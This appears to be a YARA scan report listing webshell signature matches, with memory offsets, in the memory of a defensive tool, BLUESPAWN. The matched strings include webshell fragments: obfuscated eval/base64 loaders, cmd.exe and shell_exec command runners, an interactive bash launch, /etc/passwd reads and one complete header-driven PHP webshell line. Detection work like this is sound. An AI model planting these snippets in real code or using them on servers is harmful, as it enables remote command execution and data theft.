Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_C99madShell_v__2_0_madnet_edition | PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php | Florian Roth | - 0x307e42:$s0: $md5_pass = ""; //If no pass then hash
- 0x309c3d:$s0: $md5_pass = ""; //If no pass then hash
- 0x2e121b:$s1: eval(gzinflate(base64_decode('
- 0x2e263d:$s1: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s1: eval(gzinflate(base64_decode('
- 0x2f54c3:$s1: eval(gzinflate(base64_decode('
- 0x307e75:$s1: eval(gzinflate(base64_decode('
- 0x309c70:$s1: eval(gzinflate(base64_decode('
- 0x342b7a:$s1: eval(gzinflate(base64_decode('
- 0x343912:$s1: eval(gzinflate(base64_decode('
- 0x34f3cd:$s1: eval(gzinflate(base64_decode('
- 0x3506b7:$s1: eval(gzinflate(base64_decode('
- 0x35e30e:$s1: eval(gzinflate(base64_decode('
- 0x35f97f:$s1: eval(gzinflate(base64_decode('
- 0x309c9b:$s2: $pass = ""; //Pass
- 0x309cbb:$s3: $login = ""; //Login
- 0x2e2609:$s4: //Authentication
- 0x307ef6:$s4: //Authentication
- 0x309cdc:$s4: //Authentication
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_CmdAsp_asp_php | PHP Webshells Github Archive - file CmdAsp.asp.php.txt | Florian Roth | - 0x3093b9:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e29:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e62:$s4: ' Author: Maceo <maceo @ dogmile.com>
- 0x309e94:$s5: ' -- Use a poor man's pipe ... a temp file -- '
- 0x309ed0:$s6: ' --------------------o0o--------------------
- 0x309f0a:$s8: ' File: CmdAsp.asp
- 0x309f29:$s11: <-- CmdAsp.asp -->
- 0x2d6463:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f9b:$s16: Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- 0x2d63c8:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_NCC_Shell | PHP Webshells Github Archive - file NCC-Shell.php | Florian Roth | - 0x30a153:$s0: if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
- 0x30a19f:$s1: <b>--Coded by Silver
- 0x30a1c0:$s2: <title>Upload - Shell/Datei</title>
- 0x30a1f0:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x35fd9b:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x30a249:$s14: ~|_Team .:National Cracker Crew:._|~<br>
- 0x30a27e:$s18: printf("Sie ist %u Bytes gro
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_README | PHP Webshells Github Archive - file README.md | Florian Roth | - 0x30a3d4:$s0: Common php webshells. Do not host the file(s) in your server!
- 0x30a41e:$s1: php-webshells
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_backupsql | PHP Webshells Github Archive - file backupsql.php | Florian Roth | - 0x30a55e:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x360011:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x2f567f:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a5b4:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x350815:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x36005d:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a610:$s2: * as email attachment, or send to a remote ftp server by
- 0x30a655:$s16: * Neagu Mihai<neagumihai@hotmail.com>
- 0x30a687:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
- 0x360114:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_AK_74_Security_Team_Web_Shell_Beta_Version | PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php | Florian Roth | - 0x30a84a:$s8: - AK-74 Security Team Web Site: www.ak74-team.net
- 0x30a888:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x36029d:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x30a8e5:$s10: <b><font color=#83000>Execute system commands!</font></b>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_cpanel | PHP Webshells Github Archive - file cpanel.php | Florian Roth | - 0x30aa59:$s0: function ftp_check($host,$user,$pass,$timeout){
- 0x30aa95:$s3: curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- 0x30aad5:$s4: [ user@alturks.com ]# info<b><br><font face=tahoma><br>
- 0x30ab19:$s12: curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- 0x30ab4f:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x3604c7:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x30abac:$s20: <br><b>Please enter your USERNAME and PASSWORD to logon<br>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_accept_language | PHP Webshells Github Archive - file accept_language.php | Florian Roth | - 0x30ad26:$s0: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_529 | PHP Webshells Github Archive - file 529.php | Florian Roth | - 0x30aea6:$s0: <p>More: <a href="/">Md5Cracking.Com Crew</a>
- 0x30aee1:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x36076a:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x30af3a:$s9: echo '<PRE><P>This is exploit from <a
- 0x30af6d:$s10: This Exploit Was Edited By KingDefacer
- 0x30afa0:$s13: safe_mode and open_basedir Bypass PHP 5.2.9
- 0x30afd9:$s14: $hardstyle = explode("/", $file);
- 0x30b008:$s20: while($level--) chdir("..");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_STNC_WebShell_v0_8 | PHP Webshells Github Archive - file STNC WebShell v0.8.php | Florian Roth | - 0x30b16a:$s3: if(isset($_POST["action"])) $action = $_POST["action"];
- 0x30b1ae:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x360991:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x30b209:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
- 0x3609e3:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_tryag | PHP Webshells Github Archive - file tryag.php | Florian Roth | - 0x30b38e:$s1: <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
- 0x30b3d8:$s3: $tabledump = "DROP TABLE IF EXISTS $table;\n";
- 0x30b414:$s6: $string = !empty($_POST['string']) ? $_POST['string'] : 0;
- 0x30b45c:$s7: $tabledump .= "CREATE TABLE $table (\n";
- 0x30b492:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
- 0x360bd7:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_dC3_Security_Crew_Shell_PRiV_2 | PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php | Florian Roth | - 0x304325:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b63c:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b681:$s9: header("Last-Modified: ".date("r",filemtime(__FILE__)));
- 0x30b6c6:$s13: header("Content-type: image/gif");
- 0x30b6f5:$s14: @copy($file,$to) or die ("[-]Error copying file!");
- 0x304466:$s20: if (isset($_GET['rename_all'])) {
- 0x30b735:$s20: if (isset($_GET['rename_all'])) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_qsd_php_backdoor | PHP Webshells Github Archive - file qsd-php-backdoor.php | Florian Roth | - 0x30b897:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x360edb:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x30b8f4:$s2: if(isset($_POST["newcontent"]))
- 0x30b920:$s3: foreach($parts as $val)//Assemble the path back together
- 0x30b965:$s7: $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_spygrup | PHP Webshells Github Archive - file spygrup.php | Florian Roth | - 0x30bae6:$s2: kingdefacer@msn.com</FONT></CENTER></B>");
- 0x30bb1d:$s6: if($_POST['root']) $root = $_POST['root'];
- 0x30bb54:$s12: ".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>
- 0x30bbaf:$s18: By KingDefacer From Spygrup.org>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Web_shell__c_ShAnKaR | PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php | Florian Roth | - 0x30bd18:$s0: header("Content-Length: ".filesize($_POST['downf']));
- 0x30bd5a:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x36127e:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x30bdb5:$s6: write("#\n#Server : ".getenv('SERVER_NAME')."
- 0x30bdef:$s12: foreach(@file($_POST['passwd']) as $fed)echo $fed;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz | PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php | Florian Roth | - 0x30bf88:$s7: <meta name="Copyright" content=TouCh By iJOo">
- 0x307891:$s11: directory... Trust me - it works :-) */
- 0x30bfc3:$s11: directory... Trust me - it works :-) */
- 0x30bff7:$s15: /* ls looks much better with ' -F', IMHO. */
- 0x30c030:$s16: } else if ($command == 'ls') {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Gamma_Web_Shell | PHP Webshells Github Archive - file Gamma Web Shell.php | Florian Roth | - 0x30c18d:$s4: $ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
- 0x30c1ca:$s8: ### Gamma Group <http://www.gammacenter.com>
- 0x30c203:$s15: my $error = "This command is not available in the restricted mode.\n";
- 0x30c256:$s20: my $command = $self->query('command');
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_aspydrv | PHP Webshells Github Archive - file aspydrv.php | Florian Roth | - 0x30c3b9:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x361749:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x30c410:$s1: nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
- 0x30c459:$s3: Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
- 0x30c4a3:$s17: If request.querystring("getDRVs")="@" then
- 0x30c4da:$s20: ' ---Copy Too Folder routine Start
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_JspWebshell_1_2_2 | PHP Webshells Github Archive - file JspWebshell 1.2.php | Florian Roth | - 0x3082e6:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30c63d:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30836b:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c684:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x35e6d1:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x361976:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c6dc:$s4: // String tempfilepath=request.getParameter("filepath");
- 0x30c721:$s15: endPoint=random1.getFilePointer();
- 0x30c750:$s20: if (request.getParameter("command") != null) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_g00nshell_v1_3 | PHP Webshells Github Archive - file g00nshell-v1.3.php | Florian Roth | - 0x30c8bb:$s10: #To execute commands, simply include ?cmd=___ in the url. #
- 0x30c903:$s15: $query = "SHOW COLUMNS FROM " . $_GET['table'];
- 0x30c93f:$s16: $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
- 0x30c992:$s17: echo("<form method='GET' name='shell'>");
- 0x30c9c8:$s18: echo("<form method='post' action='?act=sql'>");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_WinX_Shell | PHP Webshells Github Archive - file WinX Shell.php | Florian Roth | - 0x30cb2c:$s4: // It's simple shell for all Win OS.
- 0x30cb5d:$s5: //------- [netstat -an] and [ipconfig] and [tasklist] ------------
- 0x30cbac:$s6: <html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
- 0x30cbf5:$s13: // Created by greenwood from n57
- 0x30cc22:$s20: if (is_uploaded_file($userfile)) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_PHANTASMA | PHP Webshells Github Archive - file PHANTASMA.php | Florian Roth | - 0x30cd78:$s12: " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
- 0x30cdbf:$s15: if ($portscan != "") {
- 0x30cde2:$s16: echo "<br>Banner: $get <br><br>";
- 0x30ce10:$s20: $dono = get_current_user( );
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_cw | PHP Webshells Github Archive - file cw.php | Florian Roth | - 0x30cf5f:$s1: // Dump Database [pacucci.com]
- 0x30cf8a:$s2: $dump = "-- Database: ".$_POST['db'] ." \n";
- 0x30cfc3:$s7: $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
- 0x30d01b:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x3620b8:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x30d076:$s14: $dump .= "-- Cyber-Warrior.Org\n";
- 0x30d0a5:$s20: if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_include_w_shell | PHP Webshells Github Archive - file php-include-w-shell.php | Florian Roth | - 0x30d225:$s13: # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
- 0x30d271:$s17: "phpshellapp" => "export TERM=xterm; bash -i",
- 0x30d2ac:$s19: else if($numhosts == 1) $strOutput .= "On 1 host..\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_mysql_tool | PHP Webshells Github Archive - file mysql_tool.php | Florian Roth | - 0x30d417:$s12: $dump .= "-- Dumping data for table '$table'\n";
- 0x30d454:$s20: $dump .= "CREATE TABLE $table (\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_PhpSpy_Ver_2006 | PHP Webshells Github Archive - file PhpSpy Ver 2006.php | Florian Roth | - 0x30d5b6:$s2: var_dump(@$shell->RegRead($_POST['readregname']));
- 0x2e863f:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d5f5:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x3477d6:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x362514:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d64f:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x362565:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x30d6a8:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
- 0x3625b5:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ZyklonShell | PHP Webshells Github Archive - file ZyklonShell.php | Florian Roth | - 0x30d82d:$s0: The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
- 0x30d888:$s1: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- 0x30d8c7:$s2: <TITLE>404 Not Found</TITLE>
- 0x30d8f0:$s3: <H1>Not Found</H1>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_myshell | PHP Webshells Github Archive - file myshell.php | Florian Roth | - 0x30da3f:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x362852:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x30605e:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30da97:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x35cc07:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3628a0:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30daef:$s15: <title>$MyShellVersion - Access Denied</title>
- 0x30db2a:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
- 0x362921:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_lolipop | PHP Webshells Github Archive - file lolipop.php | Florian Roth | - 0x30dcb3:$s3: $commander = $_POST['commander'];
- 0x30dce2:$s9: $sourcego = $_POST['sourcego'];
- 0x30dd0f:$s20: $result = mysql_query($loli12) or die (mysql_error());
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simple_cmd | PHP Webshells Github Archive - file simple_cmd.php | Florian Roth | - 0x2fdb84:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x30de7b:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x2fdb55:$s2: <title>G-Security Webshell</title>
- 0x30debf:$s2: <title>G-Security Webshell</title>
- 0x2fdbc8:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x30deee:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x2fdc00:$s6: <? $cmd = $_REQUEST["-cmd"];?>
- 0x30df26:$s6: <? $cmd = $_REQUEST["-cmd"];?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_go_shell | PHP Webshells Github Archive - file go-shell.php | Florian Roth | - 0x30e075:$s0: #change this password; for power security - delete this file =)
- 0x30e0c1:$s2: if (!defined$param{cmd}){$param{cmd}="ls -la"};
- 0x30e0fd:$s11: open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
- 0x30e13b:$s12: print << "[kalabanga]";
- 0x30e15f:$s13: <title>GO.cgi</title>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_aZRaiLPhp_v1_0 | PHP Webshells Github Archive - file aZRaiLPhp v1.0.php | Florian Roth | - 0x30e2b1:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x362e9a:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x30e308:$s4: $fileperm=base_convert($_POST['fileperm'],8,10);
- 0x30e345:$s19: touch ("$path/$dismi") or die("Dosya Olu
- 0x30e37a:$s20: echo "<div align=left><a href='./$this_file?dir=$path/$file'>G
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_webshells_zehir4 | Webshells Github Archive - file zehir4 | Florian Roth | - 0x30e4f9:$s0: frames.byZehir.document.execCommand(command, false, option);
- 0x30e542:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
- 0x36308a:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_zehir4_asp_php | PHP Webshells Github Archive - file zehir4.asp.php.txt | Florian Roth | - 0x30e6ce:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x3631a8:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x30e4f9:$s11: frames.byZehir.document.execCommand(
- 0x30e72a:$s11: frames.byZehir.document.execCommand(
- 0x30e75b:$s11: frames.byZehir.document.execCommand(
- 0x36304b:$s11: frames.byZehir.document.execCommand(
- 0x3631fb:$s11: frames.byZehir.document.execCommand(
- 0x363223:$s11: frames.byZehir.document.execCommand(
- 0x30e4f9:$s15: frames.byZehir.document.execCommand(co
- 0x30e75b:$s15: frames.byZehir.document.execCommand(co
- 0x36304b:$s15: frames.byZehir.document.execCommand(co
- 0x363223:$s15: frames.byZehir.document.execCommand(co
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_lostDC | PHP Webshells Github Archive - file lostDC.php | Florian Roth | - 0x30e8bc:$s0: $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
- 0x30e901:$s4: header ( "Content-Description: Download manager" );
- 0x30e941:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x363387:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x30e997:$s9: if (mkdir($_POST['dir'], 0777) == false) {
- 0x30e9ce:$s12: $ret = shellexec($command);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_CasuS_1_5 | PHP Webshells Github Archive - file CasuS 1.5.php | Florian Roth | - 0x30eb1c:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x3634e1:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x30eb73:$s8: $fonk_kap = get_cfg_var("fonksiyonlary_kapat");
- 0x30ebaf:$s18: if (file_exists("F:\\")){
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ftpsearch | PHP Webshells Github Archive - file ftpsearch.php | Florian Roth | - 0x30ecfb:$s0: echo "[-] Error : coudn't read /etc/passwd";
- 0x30ed34:$s9: @$ftp=ftp_connect('127.0.0.1');
- 0x30ed60:$s12: echo "<title>Edited By KingDefacer</title><body>";
- 0x30ed9f:$s19: echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x30f01a:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x363882:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x30f073:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x3638d2:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x30f0cd:$s11: * Coded by Pixcher
- 0x30f0ef:$s16: <input type=text size=55 name=newfile value="$d/newfile.php">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah | PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php | Florian Roth | - 0x30f38d:$s1: 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
- 0x30f3d4:$s2: 'Running processes' => "runcommand('ps -aux','GET')",
- 0x30f416:$s3: $dt = $_POST['filecontent'];
- 0x30f43f:$s4: 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
- 0x30f48f:$s6: print "Sorry, none of the command functions works.";
- 0x30f4d0:$s11: document.cmdform.command.value='';
- 0x30f4ff:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
- 0x363c52:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_7 | PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php | Florian Roth | - 0x30f76f:$s0: header("Content-disposition: filename=$filename.sql");
- 0x30f7b2:$s1: else if( $action == "dumpTable" || $action == "dumpDB" ) {
- 0x30f7f9:$s2: echo "<font color=blue>[$USERNAME]</font> - \n";
- 0x30f836:$s4: if( $action == "dumpTable" )
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall | PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php | Florian Roth | - 0x30fadf:$s2: if(!$result2)$dump_file.='#error table '.$rows[0];
- 0x30fb1e:$s4: if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
- 0x30fb69:$s6: header('Content-Length: '.strlen($dump_file)."\n");
- 0x30fba9:$s20: echo('Dump for '.$db_dump.' now in '.$to_file);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_8 | PHP Webshells Github Archive - from files Macker\'s Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php | Florian Roth | - 0x30fdb1:$s1: elseif ( $cmd=="file" ) { /* View a file in text --> */
- 0x3086c8:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fdfa:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fe43:$s3: /* I added this to ensure the script will run correctly...
- 0x30fe8a:$s14: </form> -->
- 0x2df00c:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x2fa80d:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x30feac:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x341408:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x3545bb:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x30feed:$s20: elseif ( $cmd=="downl" ) { /* Save the edited file back to a file --> */
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt | Florian Roth | - 0x3101bc:$s1: <font color="#000000">Sil</font></a></font></td>
- 0x3101f9:$s5: <td width="122" height="17" bgcolor="#9F9F9F">
- 0x310234:$s6: onfocus="if (this.value == 'Kullan
- 0x310263:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
- 0x3645e1:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_9 | PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php | Florian Roth | - 0x3104e9:$s2: :<b>" .base64_decode($_POST['tot']). "</b>";
- 0x310522:$s6: if (isset($_POST['wq']) && $_POST['wq']<>"") {
- 0x31055d:$s12: if (!empty($_POST['c'])){
- 0x310583:$s13: passthru($_POST['c']);
- 0x3105a6:$s16: <input type="radio" name="tac" value="1">B64 Decode<br>
- 0x3105ea:$s20: <input type="radio" name="tac" value="3">md5 Hash
|
